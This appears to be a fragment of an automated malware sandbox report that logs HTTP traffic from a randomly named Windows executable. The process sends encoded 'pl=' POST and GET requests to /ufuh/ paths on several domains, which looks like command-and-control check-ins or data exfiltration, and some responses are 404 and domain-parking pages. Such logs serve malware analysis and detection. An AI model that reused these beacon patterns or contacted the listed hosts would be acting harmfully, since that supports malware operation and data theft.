                                                                                            3192.168.2.224916794.23.162.163802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:27:32.722992897 CEST738OUTPOST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 199
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.kinkynerdspro.blog
                                                                                            Origin: http://www.kinkynerdspro.blog
                                                                                            Referer: http://www.kinkynerdspro.blog/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            Data Raw: 70 6c 3d 53 38 6f 6e 68 39 36 57 74 75 52 2f 45 31 53 62 33 4b 66 53 41 39 5a 47 6c 32 6e 4b 47 58 78 6e 48 33 49 2b 4b 49 39 39 65 52 77 59 49 6d 2b 56 57 32 61 7a 2b 62 39 46 6b 51 37 63 65 48 78 66 72 2f 77 4a 6b 6e 79 54 6f 62 30 6e 46 62 42 51 48 4c 57 6a 69 76 57 65 46 77 68 62 38 5a 73 6e 73 4f 74 37 58 6a 46 39 38 39 42 70 66 31 41 6e 4a 74 43 52 4c 32 31 5a 2b 67 69 6b 5a 69 79 39 43 35 6b 6a 44 53 61 41 67 58 50 6b 46 64 78 76 51 63 4a 50 63 66 41 7a 57 74 58 6f 31 74 6b 6d 36 70 58 31 71 31 30 4c 6c 4b 57 68 39 7a 45 32 73 77 50 59 47 6a 6a 4c 56 4c 57 4c 64 57 31 6e 59 41 3d 3d
                                                                                            Data Ascii: pl=S8onh96WtuR/E1Sb3KfSA9ZGl2nKGXxnH3I+KI99eRwYIm+VW2az+b9FkQ7ceHxfr/wJknyTob0nFbBQHLWjivWeFwhb8ZsnsOt7XjF989Bpf1AnJtCRL21Z+gikZiy9C5kjDSaAgXPkFdxvQcJPcfAzWtXo1tkm6pX1q10LlKWh9zE2swPYGjjLVLWLdW1nYA==


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            4192.168.2.224916894.23.162.163802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:27:35.405441046 CEST2578OUTPOST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 3623
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.kinkynerdspro.blog
                                                                                            Origin: http://www.kinkynerdspro.blog
                                                                                            Referer: http://www.kinkynerdspro.blog/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            Data Raw: 70 6c 3d 53 38 6f 6e 68 39 36 57 74 75 52 2f 46 57 61 62 79 72 66 53 58 74 5a 48 38 32 6e 4b 49 33 78 6a 48 77 41 2b 4b 4e 45 67 65 6c 55 59 49 56 57 56 52 55 79 7a 74 4c 39 46 69 51 37 69 54 6e 77 55 72 2f 55 46 6b 6c 61 70 6f 59 59 6e 4b 63 46 51 57 64 4b 67 74 2f 57 63 42 77 68 55 38 5a 73 79 73 4f 64 33 58 6a 42 45 38 39 5a 70 66 6e 59 6e 50 64 43 4f 56 6d 31 5a 2b 67 69 6f 5a 69 7a 75 43 35 38 37 44 57 58 48 67 68 4c 6b 47 34 39 76 41 4c 39 4d 58 2f 42 34 49 64 57 6f 30 75 39 73 2f 4a 50 58 32 47 77 46 6b 62 4f 6b 33 30 38 67 75 68 72 71 4d 68 4c 55 53 66 43 46 56 45 77 4a 4f 36 6a 56 6f 46 4a 53 70 65 4a 37 47 62 73 58 67 4b 6c 64 56 38 6d 47 44 43 4e 6e 50 36 75 6c 78 37 53 55 39 34 6c 54 47 68 53 69 42 4d 4f 44 47 62 33 6b 4f 30 61 65 71 32 51 2f 44 33 57 67 76 70 37 34 45 48 66 36 39 73 43 52 77 33 4c 68 31 2f 34 6c 36 59 48 5a 4f 4f 66 79 76 50 58 53 36 78 75 78 39 56 4d 72 51 47 59 35 51 42 46 71 64 4f 30 42 56 41 6e 42 67 67 63 49 74 43 70 32 69 6a 2f 45 44 69 2f 4a 5a 42 47 70 39 43 63 [TRUNCATED]
                                                                                            Data Ascii: pl=S8onh96WtuR/FWabyrfSXtZH82nKI3xjHwA+KNEgelUYIVWVRUyztL9FiQ7iTnwUr/UFklapoYYnKcFQWdKgt/WcBwhU8ZsysOd3XjBE89ZpfnYnPdCOVm1Z+gioZizuC587DWXHghLkG49vAL9MX/B4IdWo0u9s/JPX2GwFkbOk308guhrqMhLUSfCFVEwJO6jVoFJSpeJ7GbsXgKldV8mGDCNnP6ulx7SU94lTGhSiBMODGb3kO0aeq2Q/D3Wgvp74EHf69sCRw3Lh1/4l6YHZOOfyvPXS6xux9VMrQGY5QBFqdO0BVAnBggcItCp2ij/EDi/JZBGp9CcmdTqWuHqZYiuKN4leFLIHFqxkfOmPgLrVOIz601lQVy4bERfLaNGoYMgXJx5VtR95oH+eUYw35K0DD46zbrrYRX5BSCJOnNa58iNukxCJSHWv67GVkkVN8mjhFMRhprX6uVrlv8bEWaZgqEb3cRr/yg4IQUSCrmcUBMp7OVgq5XmSU977vOFKauztEPIoAGhT2OxmrqZPRD08y7XX+sbyErQLRbvnUfaUe4ESfCIeDVmE/HB6dnOCC9DNocdaEt/jUHMtlyf4GzzFySANWDp4bGKM6Gfw5veCfjjWiLeggbGCYhtwSztajF/3wp/OXlvKca7e5D2bo8W219wBzfI2iQTpePln3pD4yII1+k89wvsHbtbTMxY9LLK9tgBNf3gKVgrkvNqpMtQRdX8OoIEpGh/TK4JtEHUTI/PDGns89f6NQdjdB356fyeB7CdQmggopPJ+VbVNvIn+PYmuhEDZXvPGFRW1/v77qQReVXk6WDAflKbEvHRi/QJPdZd+h5zsu9oXqzXnV+p+K3GtRZS4ZBgNDN2nsvjZawiY829VPAJxMwBuqAd9hmRyeXd3KbapJrIqhQqw/qmf+FYRdnm5A+N1IvIVEEDMq1H/DX/o48zxIiZHfyJDS19rjfMWL8n92BsQPKu1bMeb2y4e/07MUTfs7MRsMnhg5 [TRUNCATED]


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            5192.168.2.224916994.23.162.163802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:27:38.140760899 CEST471OUTGET /ufuh/?pl=f+AHiK2Co9o+PjKa95eLWuYGzAnlJ1JKF0U6Lu5lfhAIXWifWEmzyo1tk2ryUUFbnpUI1yrkhJgLANJ0QoKTotmHPxBrzP8E8/tDVQZOz/lyKkl1Bs+TKl0SxUzf&5h1t=6H6PKFvXjtI4u8k HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Connection: close
                                                                                            Host: www.kinkynerdspro.blog
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            May 2, 2024 08:27:38.308695078 CEST739INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                            Date: Thu, 02 May 2024 06:27:38 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 580
                                                                                            Connection: close
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            6192.168.2.2249170194.9.94.86802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:27:43.797481060 CEST2578OUTPOST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 2159
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.xn--matfrmn-jxa4m.se
                                                                                            Origin: http://www.xn--matfrmn-jxa4m.se
                                                                                            Referer: http://www.xn--matfrmn-jxa4m.se/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            Data Raw: 70 6c 3d 45 41 4e 63 46 47 39 32 58 46 4e 61 36 68 55 31 66 55 47 32 30 7a 71 78 71 52 4b 78 76 49 64 53 63 66 73 76 68 48 54 49 4f 46 66 77 69 77 67 37 47 6e 4f 59 62 7a 42 6a 50 62 74 73 5a 62 48 61 58 4b 35 4d 76 74 69 6d 67 4f 65 64 43 70 68 79 7a 42 54 5a 6a 5a 68 64 57 63 62 70 6a 64 59 7a 44 56 63 6f 68 72 77 35 6d 5a 37 59 49 58 67 69 67 4b 4c 2b 55 50 6f 37 47 46 37 7a 67 75 52 36 62 44 64 73 59 64 71 65 79 54 38 45 66 6f 73 61 54 68 6a 65 4c 45 38 31 78 46 78 59 4e 79 78 7a 63 79 68 69 7a 5a 77 31 4a 6c 6b 6a 53 32 78 70 49 6e 76 47 68 48 2f 37 55 57 42 2f 63 33 6b 74 39 7a 67 38 2f 6e 71 73 42 75 56 78 63 66 41 35 58 6d 55 6c 71 31 45 61 56 4d 69 6a 47 2b 54 38 55 43 6f 39 71 4a 5a 64 51 30 5a 57 72 71 6f 41 34 73 2f 31 32 4f 59 62 63 73 6d 48 70 4d 4f 4e 5a 37 54 72 5a 52 67 57 65 45 69 37 71 6a 79 48 77 61 43 2b 6e 7a 70 51 47 57 77 6d 6d 51 67 4b 64 4c 6e 45 4e 4e 6b 32 57 44 70 62 35 67 63 59 6c 4a 76 50 75 38 66 36 44 41 31 59 38 36 7a 31 61 37 68 72 57 4b 65 61 71 4b 52 42 2f 67 67 [TRUNCATED]
                                                                                            Data Ascii: pl=EANcFG92XFNa6hU1fUG20zqxqRKxvIdScfsvhHTIOFfwiwg7GnOYbzBjPbtsZbHaXK5MvtimgOedCphyzBTZjZhdWcbpjdYzDVcohrw5mZ7YIXgigKL+UPo7GF7zguR6bDdsYdqeyT8EfosaThjeLE81xFxYNyxzcyhizZw1JlkjS2xpInvGhH/7UWB/c3kt9zg8/nqsBuVxcfA5XmUlq1EaVMijG+T8UCo9qJZdQ0ZWrqoA4s/12OYbcsmHpMONZ7TrZRgWeEi7qjyHwaC+nzpQGWwmmQgKdLnENNk2WDpb5gcYlJvPu8f6DA1Y86z1a7hrWKeaqKRB/ggH1ngkjbmnacjHcRIdhoMMJ9UcsuxAkv+1nlgkVq/iIxTlrj7CSiqxS/Tx1Y2guXjKMaun/W6pMiK9Kh5M6vQ3UDSvifYcVffwjKSM5ViWcnzSdhdipgYGyHG0e1TmQnoRqSDmBMiu/AWbPBAUgN4U5jirDKxvvKp9AJabH8khUGfENgciKOOrn0XgjqGuYv6MHbTrGahZkApWLnj/ZP3cYqGWzPhd3a0ZdBgLWq+JqEdiDzF8MiQ7h/WUGEDuL1gbin2R4lZIowjzjLZZ0x7ZpHL3eTF2eA2fH0MDJ8VrzWRsFT1yWRiMPBl6LS3apgWnsMCMQy9FraggbGR22n/CpjX973vD+rP7hIZ9TlCBD65reY8V+PQ3unF5T7qgxDZXCsGrAyrEyiS3ddcEIbSIGsc5OZwRCG4OlMsJQeGF6C6P1MJrO9ki+bsePp1mLBAi5NErumAtiGO9LLltjhsfBkrwCUgRWr0hdf+3hBNQVKjRmNoPPcHClfzZt1XLtQGGubui4sATmXJSoSCn7G5sRRLnALr4PQ51av2S0+OwLzlIfVckj+xIIgTYzcSBYaKP+RBfp5LMeN9kJT89CH7/lnZN1srKOisczcmPebg8P9e8etgq6gjPlQuCkJBK16uT9ZaCGdZ68umA/dNVi3YxpG9qdhh0TwpiO [TRUNCATED]
                                                                                            May 2, 2024 08:27:43.981257915 CEST127OUTData Raw: 48 4d 36 58 62 6b 62 6f 61 68 33 63 64 6b 59 58 71 72 74 58 64 58 47 62 2f 76 48 75 57 37 77 70 43 50 47 73 47 57 49 73 63 30 64 49 69 74 69 75 50 37 62 70 65 58 51 55 71 44 78 73 4b 6a 50 74 4f 36 50 41 6f 57 52 55 49 42 6b 51 4e 62 34 4a 42 56
                                                                                            Data Ascii: HM6Xbkboah3cdkYXqrtXdXGb/vHuW7wpCPGsGWIsc0dIitiuP7bpeXQUqDxsKjPtO6PAoWRUIBkQNb4JBVEDY5fEQ26StEYEURAmR4OcYKx4E1KcPf1HxzBwK9Cea31
                                                                                            May 2, 2024 08:27:44.165466070 CEST1289INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Thu, 02 May 2024 06:27:44 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/8.1.24
                                                                                            Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                                                            Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                                            May 2, 2024 08:27:44.165488005 CEST1289INData Raw: 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61 6e 64 20 28 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 33 32 36 64 70 69 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 6c 6f 6f 70 69 61
                                                                                            Data Ascii: le-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet
                                                                                            May 2, 2024 08:27:44.165504932 CEST1289INData Raw: 20 74 6f 20 76 69 65 77 20 74 68 65 20 64 6f 6d 61 69 6e 20 68 6f 6c 64 65 72 27 73 20 70 75 62 6c 69 63 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 41 72 65 20 79 6f 75 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68
                                                                                            Data Ascii: to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_con
                                                                                            May 2, 2024 08:27:44.165586948 CEST1289INData Raw: 6c 20 63 6f 6e 74 72 6f 6c 20 6f 66 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 77 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 3c 2f 68 33 3e 0a 09 09 09 3c 70 3e 57 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62
                                                                                            Data Ascii: l control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingwe
                                                                                            May 2, 2024 08:27:44.165640116 CEST661INData Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72
                                                                                            Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
                                                                                            May 2, 2024 08:27:44.165678978 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            7192.168.2.2249171194.9.94.86802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:27:46.499875069 CEST744OUTPOST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 199
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.xn--matfrmn-jxa4m.se
                                                                                            Origin: http://www.xn--matfrmn-jxa4m.se
                                                                                            Referer: http://www.xn--matfrmn-jxa4m.se/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            Data Raw: 70 6c 3d 45 41 4e 63 46 47 39 32 58 46 4e 61 36 69 73 31 51 6c 47 32 31 54 71 78 36 42 4b 78 6d 6f 64 55 63 66 67 6e 68 44 72 59 4f 32 50 77 69 42 51 37 47 56 57 59 63 7a 42 6b 41 37 74 77 58 37 47 65 58 4b 34 6e 76 73 4f 6d 67 4f 61 64 43 4c 4a 79 31 44 37 47 37 35 68 66 51 63 62 73 6a 64 63 59 44 56 51 65 68 71 59 35 6d 66 62 59 4c 55 59 69 78 59 6a 2b 65 66 6f 48 41 46 37 6b 67 75 4e 56 62 44 4e 30 59 65 75 65 79 6d 41 45 66 5a 4d 61 52 47 33 65 45 6b 38 30 72 31 77 4a 4d 58 55 65 62 79 4a 75 36 36 67 67 47 6d 4a 4f 51 56 5a 71 4f 6e 54 4f 6a 46 36 57 55 44 77 76 61 55 4a 7a 6e 51 3d 3d
                                                                                            Data Ascii: pl=EANcFG92XFNa6is1QlG21Tqx6BKxmodUcfgnhDrYO2PwiBQ7GVWYczBkA7twX7GeXK4nvsOmgOadCLJy1D7G75hfQcbsjdcYDVQehqY5mfbYLUYixYj+efoHAF7kguNVbDN0YeueymAEfZMaRG3eEk80r1wJMXUebyJu66ggGmJOQVZqOnTOjF6WUDwvaUJznQ==
                                                                                            May 2, 2024 08:27:46.689835072 CEST1289INHTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Thu, 02 May 2024 06:27:46 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/8.1.24
                                                                                            Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                                                            Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                                            May 2, 2024 08:27:46.689853907 CEST1289INData Raw: 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61 6e 64 20 28 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 33 32 36 64 70 69 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 6c 6f 6f 70 69 61
                                                                                            Data Ascii: le-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet
                                                                                            May 2, 2024 08:27:46.689979076 CEST1289INData Raw: 20 74 6f 20 76 69 65 77 20 74 68 65 20 64 6f 6d 61 69 6e 20 68 6f 6c 64 65 72 27 73 20 70 75 62 6c 69 63 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 41 72 65 20 79 6f 75 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68
                                                                                            Data Ascii: to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_con
                                                                                            May 2, 2024 08:27:46.689992905 CEST1289INData Raw: 6c 20 63 6f 6e 74 72 6f 6c 20 6f 66 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 77 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 3c 2f 68 33 3e 0a 09 09 09 3c 70 3e 57 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62
                                                                                            Data Ascii: l control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingwe
                                                                                            May 2, 2024 08:27:46.690090895 CEST661INData Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72
